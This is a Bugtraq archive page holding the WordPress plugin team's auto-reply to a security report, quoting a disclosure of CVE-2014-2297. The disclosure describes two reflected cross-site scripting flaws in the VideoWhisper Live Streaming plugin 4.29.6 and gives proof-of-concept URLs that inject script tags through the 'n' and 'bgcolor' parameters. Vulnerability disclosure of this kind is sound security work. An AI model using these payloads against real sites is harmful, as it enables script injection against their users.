Bugtraq mailing list archives
Re: CVE-2014-2297(WordPress-videowhisper-live-streaming-integration 4.29.6-Xss)
From: "Ipstenu \(Mika Epstein\)" <plugins () wordpress org>
Date: Tue, 8 Apr 2014 21:52:35 +0000
Thank you for reporting this plugin. We're looking into it right now. If you wish to help us speed up the process, please remember to include a clear and concise description of the issue. In the case of any security exploits, it greatly helps if you can provide us with how you verified this is an exploit (links to the plugin listing on sites like Secuina are perfect). If you provided a link to your report, DO NOT delete it! We have passed it on directly to the developers of the plugin. Please note: You may not receive further communication from us on this matter, simply due to the volume of emails we get a day. We do greatly appreciate the report.
Hi All, CVE-2014-2297(WordPress-videowhisper-live-streaming-integration 4.29.6-Xss), as follows: [»] Language: [php ] [»] Version: [ version4.29.6 ] [»] Team: Vty########################################################################### ===[ Exploit ]== [»] Exploit-1:videowhisper-live-streaming-integration/ls/htmlchat.php File before using the variable n is not initialized, resulting in cross-site scripting vulnerabilities, the specific code in line 34 of the file(Code:<title><?=$n?> Text Chat</title>): http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=</title><script>alert(1)</script> [»] Exploit-2:videowhisper-live-streaming-integration/ls/index.php Bgcolor file using variables not previously initialized, resulting in cross-site scripting vulnerabilities, the specific code in the sixth line of the file(Code:<body bgcolor="<?=$bgcolor?>">): http://localhost//wp/wp-content/plugins/videowhisper-live-streaming-integration/ls/index.php?bgcolor="><script>alert(1)</script>//
-- Ipstenu (Mika Epstein)
Current thread:
- Re: CVE-2014-2297(WordPress-videowhisper-live-streaming-integration 4.29.6-Xss) Ipstenu (Mika Epstein) (Apr 09)